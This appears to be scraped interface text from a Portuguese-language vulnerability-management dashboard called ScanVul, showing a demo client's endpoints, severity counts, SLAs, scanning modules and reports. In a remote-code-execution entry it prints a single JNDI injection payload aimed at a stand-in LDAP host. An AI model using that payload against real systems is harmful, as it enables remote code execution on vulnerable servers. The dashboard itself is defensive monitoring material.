Visão geral da operação
Cliente Demo · 87 endpoints monitorados · janela 30 dias
Operação contínua · cada vulnerabilidade segue um caminho
Identificada, classificada por risco, priorizada, corrigida (remotamente sempre que possível), validada e monitorada. Tudo controlado por sistema, com SLA e responsável em cada estágio.
Módulos ScanVul
Distribuição por severidade
SLA — últimos 30 dias
Top 5 vulnerabilidades por SVS
Vulnerabilidades
142 abertas · 27 em correção · 9 em validação · 102 monitoradas (30d) · 1.247 fechadas (90d)
RCE remoto via desserialização
Aplicação Java · SVS 96 · CVSS 9.6 · KEV listada · ativo SRV-WEB-01
Estágio atual no fluxo
Mitigar exposição a RCE via desserialização
${jndi:ldap://atk/x} em qualquer entrada loggada. Esta CVE consta na lista CISA KEV (exploit ativo em campanhas de ransomware) e tem alta probabilidade de exploração no curto prazo.SVS · ScanVul Score
Ativo afetado
Quadro de tickets · operação contínua
27 tickets em fluxo ativo · 102 em monitoramento · SLA de resolução: 16h em 8×5
Ativos monitorados
87 ativos · 84 com Sensor instalado · 4 web públicos · 1 Probe interno
CScanVul Core
Visibilidade contínua · inventário, vulnerabilidades autenticadas, postura de endpoint cloud e superfície externa
Categorias de visibilidade
Inventário e descoberta de ativos
Vulnerabilidades de SO e Software
Gestão de patches e atualizações
Postura cloud · M365 e Defender
Superfície externa (ASM)
SScanVul Sensor
Postura granular de endpoint · adaptativo Win/Mac/Linux · 84 endpoints conectados
Implante o Sensor nos seus endpoints
Agente leve em Go · 18MB · sem driver de kernel · sem hook em processo · footprint <1% CPU em idle. Coleta posture adaptada por sistema operacional. Distribuição via GPO (Win), MDM (Mac) ou pacote (Linux).
Token de enrollment (Cliente Demo)
Cobertura de checks por SO
Endpoints com Sensor
PScanVul Probe
Scanner de infraestrutura on-premise · CVEs de rede e serviços · scan autenticado e não autenticado
Probe Cliente Demo · sede
Scans recentes
WScanVul WebScan
Análise contínua de aplicações web · OWASP Top 10 · CVEs de framework · headers e cookies
Alvos web monitorados
Acompanhamento operacional
Reuniões PDCA, evolução de SLA e plano de ação · plano Estendida
SLA — evolução 6 meses
Próximas reuniões PDCA
Plano de ação · derivado da última reunião PDCA
Relatórios
Executivo, operacional e técnico · gerados sob demanda ou agendados
Relatório Executivo Mensal
Visão estratégica para diretoria · indicadores de SLA, tendências, evolução de maturidade.
Relatório Operacional
Detalhamento técnico para o time de TI · todas vulnerabilidades, ações tomadas, plano.
Vulnerabilidades Críticas
Lista detalhada das vulnerabilidades classificadas como críticas e altas, com playbooks.
Inventário de Ativos
Snapshot completo do parque · sistemas operacionais, criticidade, vulns por host.
Plano de Ação · PDCA
Itens da última reunião PDCA · responsáveis, prazos, status atual de cada ação.
Compliance & Postura
Status de conformidade · MFA, criptografia, AV, patches, configurações de segurança.
Histórico de relatórios gerados
Configurações da operação
Plano, módulos, SLA, notificações e usuários
Configurações gerais
Módulos do plano
O plano Estendida inclui todos os 4 módulos. A Avançada adiciona Shodan, geolocalização e suporte 24×7.